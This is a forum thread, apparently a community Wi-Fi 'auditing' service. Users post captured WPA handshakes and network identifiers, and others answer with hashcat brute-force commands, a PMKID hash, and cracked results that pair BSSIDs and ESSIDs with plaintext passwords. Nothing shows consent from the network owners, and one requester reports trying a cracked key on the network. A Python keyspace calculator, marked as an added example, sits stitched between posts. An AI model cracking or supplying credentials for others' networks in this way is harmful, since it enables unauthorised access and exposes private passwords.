WPA / WPA2 Auditing Service

Discussion in 'Community Services' started by Mr. Penguin, 11 Apr 2013.

  1. Ntrain2k

    Ntrain2k Well-Known Member

    Joined:
    31 Oct 2012
    Messages:
    110
    Likes Received:
    113
    I can't find anything on it to give me an idea of a default mask.
    --- Double Post Merged, 4 May 2020, Original Post Date: 4 May 2020 ---
    If I could get pskracker working I would. It's a big default keyspace.

    Vodaphone_XXXXXXXX - [0-9a-z] - Len: 15
     
    • Friendly Friendly x 1
  2. Rakibul Hassan

    Joined:
    25 Aug 2019
    Messages:
    10
    Likes Received:
    8
    How do I get an idea of the default mask? Can you tell me?
     
    • Like Like x 1
  3. Ntrain2k

    Ntrain2k Well-Known Member

    If you could find a few of the routers that have been cracked we may be able to find a pattern in the keys.

    Could also look for pictures of the labels online?
    --- Double Post Merged, 5 May 2020, Original Post Date: 4 May 2020 ---
    Closest I can figure out from the cap you uploaded before is that it could be 8 characters, a-z, A-Z,0-9.

    Would be a bear.

     
    • Like Like x 1
    • Friendly Friendly x 1
  4. mathewgx

    mathewgx Well-Known Member

    Joined:
    26 Sep 2016
    Messages:
    56
    Likes Received:
    49
    Which command would you use?
     
    • Like Like x 1
  5. Ntrain2k

    Ntrain2k Well-Known Member

    Using hashcat to bruteforce the vodafone one:
    hashcat -m 2500 -a 3 -w 3 1.hccapx ?1?1?1?1?1?1?1?1?1?1?1?1?1?1?1 -1 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

    I tried to fire it up as a test and got an integer overflow error.

    For the tenda earlier:

    hashcat -m 2500 -a 3 -w 3 1.hccapx ?1?1?1?1?1?1?1?1 -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

    At 670 kH/s it would take:
    [​IMG]

    Here is pskracker:
    https://github.com/soxrok2212/PSKracker
     
    #3225 Ntrain2k, 5 May 2020
    Last edited: 5 May 2020
    • Like Like x 1
  6. mathewgx

    mathewgx Well-Known Member

    @Ntrain2k, would it be easier with pskracker?
    I don't understand how to use it.

    pskracker -t , what would the value of t be?
     
    • Like Like x 1
  7. Ntrain2k

    Ntrain2k Well-Known Member

    • Like Like x 1
  8. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    526
    The ideal command line for that would be:
    hashcat -m 2500 -w 4 --status /your.hccapx -a 3 -1 ?u?l?d ?1?1?1?1?1?1?1?1

    But you will get integer overflow - not enough VRAM, plus this would take forever to complete.
    Try an evil twin attack.
    --- Double Post Merged, 6 May 2020, Original Post Date: 6 May 2020 ---
    -t is the router model
     
    • Like Like x 1
  9. Ntrain2k

    Ntrain2k Well-Known Member

    Interesting. What does ?u?l?d before the mask do?
     
    • Winner Winner x 1
  10. longshanks

    longshanks Well-Known Member
    VIP

    You set the number one to represent upper, lower and digits.
    It saves time compared to typing:
    abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 :cigar:
     
    • Friendly Friendly x 1
    • Funny Funny x 1
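
An added example, not part of any post above and not hashcat's own code: a small calculator that expands custom charsets such as `-1 ?u?l?d`, counts the candidates a mask generates, and estimates how long a default-key pattern withstands exhaustive search at a given rate. The function names and the `U64_LIMIT` threshold (a 64-bit keyspace counter) are assumptions made for the illustration.

```python
import string

# hashcat's built-in mask charsets (?l ?u ?d ?h ?H ?s ?a)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " " + string.punctuation,
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]

U64_LIMIT = 2**64  # assumption: keyspace is tracked in a 64-bit counter


def tokens(spec):
    """Yield ('set', x) for each ?x placeholder and ('lit', c) for literals."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            nxt = spec[i + 1]
            yield ("lit", "?") if nxt == "?" else ("set", nxt)
            i += 2
        else:
            yield ("lit", spec[i])
            i += 1


def charset(definition):
    """Expand a custom charset (-1..-4): literals and/or built-in sets."""
    chars = set()
    for kind, val in tokens(definition):
        chars |= {val} if kind == "lit" else set(BUILTIN[val])
    return chars


def keyspace(mask, custom=None):
    """Number of candidates a mask generates; literal positions count as 1."""
    sets = {k: charset(v) for k, v in (custom or {}).items()}
    total = 1
    for kind, val in tokens(mask):
        if kind == "set":
            total *= len(sets[val]) if val in sets else len(BUILTIN[val])
    return total


def assess(mask, custom, rate_hps):
    n = keyspace(mask, custom)
    years = n / rate_hps / (365 * 24 * 3600)
    return {"keyspace": n, "fits_u64": n < U64_LIMIT, "years": years}
```

Calling `assess("?1" * 8, {"1": "?u?l?d"}, 670_000)` sizes the 8-character mixed-case mask at the 670 kH/s rate quoted earlier in the thread; the same call with fifteen `?1` positions and a 36-character set sizes the longer pattern.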
  11. Ntrain2k

    Ntrain2k Well-Known Member

    Sweet. Thanks!
     
    • Like Like x 1
  12. mathewgx

    mathewgx Well-Known Member

    @petrovivo1234 ,
    How about a new one ?

    ESSID.......: asf
    BSSID.......: 74:4D:28:BB:55:F7
     

    Attached Files:

    • asf.cap
      File size:
      355 KB
      Views:
      5
    • Like Like x 1
  13. Ntrain2k

    Ntrain2k Well-Known Member

    74:4D:28 Routerboard.com

    That's an odd one....
     
    • Like Like x 1
  14. petrovivo1234

    petrovivo1234 Well-Known Member
    VIP

    Joined:
    19 May 2018
    Messages:
    441
    Likes Received:
    519
    Let's see it..
    --- Double Post Merged, 31 May 2020, Original Post Date: 31 May 2020 ---
    Tried 8?d, phone/mobile numbers, some wordlists, names+years, names+2?d, 3?d - nothing..
     

    • Like Like x 1
  15. longshanks

    longshanks Well-Known Member
    VIP

    Pmkid : a515053fcb68ddad25ff153541b8a207*744d28bb55f7*c46516773684*617366
     
    • Like Like x 1
  16. X-Factor

    X-Factor Well-Known Member

    Joined:
    7 Apr 2018
    Messages:
    25
    Likes Received:
    16
    Here is another one, if someone can give it a try:
    BSSID: 90:F6:52:C6:D8:86
    ESSID: Faroos
    Probables: 10-digit Numeric key, if not that then just try whatever you can.
     

    • Like Like x 1
  17. a4apple

    a4apple Active Member

    Joined:
    23 Mar 2014
    Messages:
    59
    Likes Received:
    36
    Can anyone help me with cracking either of these caps? I would really appreciate it if anyone manages to crack them. I tried brute force, but little did I know that my laptop is not strong enough for it and would need forever to crack one. :( BTW, I am from Malaysia. Please let me know if you need any more info and I will try my very best to assist. Thank you in advance!

    BSSID: 50:29:F5:DB:35:D1 (Guangdong Oppo Mobile Telecommunications Corp.,Ltd)
    ESSID: ratna nana

    BSSID: A4:B1:E9:98:70:AD (Technicolor)
    ESSID: Nikhanis

    BSSID: C8:3A:35:7B:58:4A (Tenda Technology Co., Ltd.)
    ESSID: Umbile puchong
     

    • Like Like x 1
  18. carnivore1

    carnivore1 Well-Known Member

    Joined:
    22 Jul 2018
    Messages:
    128
    Likes Received:
    125
    5029f5db35d1:fe39684ffe43:ratna nana:123454321

    Session..........: hashcat
    Status...........: Cracked
     
    • Like Like x 2
    • Friendly Friendly x 1
  19. a4apple

    a4apple Active Member

    Thank you very much sir! I’ve tried it but unfortunately it couldn’t connect. I wonder why but that’s okay, I mean you helped me and I couldn’t demand much. Maybe I have a crappy laptop. It would be nice if the other two can be cracked as well so that I can try again. Once again thank you!
    --- Double Post Merged, 29 Jun 2020, Original Post Date: 29 Jun 2020 ---
    Managed to obtain a few more handshakes. I would really appreciate it if someone can help me. BTW, there are TP-Link routers; I would like to know if there is any general password for such a router?

    BSSID: 50:D4:F7:40:1F:55 (Tp-Link Technologies Co.,Ltd.)
    ESSID: TP-Link 1F55

    BSSID: B0:BE:76:FC:6E:2E
    ESSID: aabbcc111

    BSSID: D8:0D:17:21:62:1C (Tp-Link Technologies Co.,Ltd.)
    ESSID: blue
     

    • Like Like x 1
  20. petrovivo1234

    petrovivo1234 Well-Known Member
    VIP

    50d4f7401f55:d88f7677e09a:TP-Link_1F55:28986344

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: WPA-EAPOL-PBKDF2
    Hash.Target......: TP-Link_1F55 (AP:50:d4:f7:40:1f:55 STA:d8:8f:76:77:e0:9a)
    Time.Started.....: Mon Jun 29 08:16:04 2020 (58 secs)

    d80d1721621c:c406839f252d:blue:Abcd1234

    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: WPA-EAPOL-PBKDF2
    Hash.Target......: blue (AP:d8:0d:17:21:62:1c STA:c4:06:83:9f:25:2d)
    Time.Started.....: Mon Jun 29 08:19:03 2020 (1 sec)
    Time.Estimated...: Mon Jun 29 08:19:04 2020 (0 secs)


    [*] BSSID=b0:be:76:fc:6e:2e ESSID=aabbcc111 (Length: 9)

    Written 0 WPA Handshakes to:
     
    • Like Like x 3
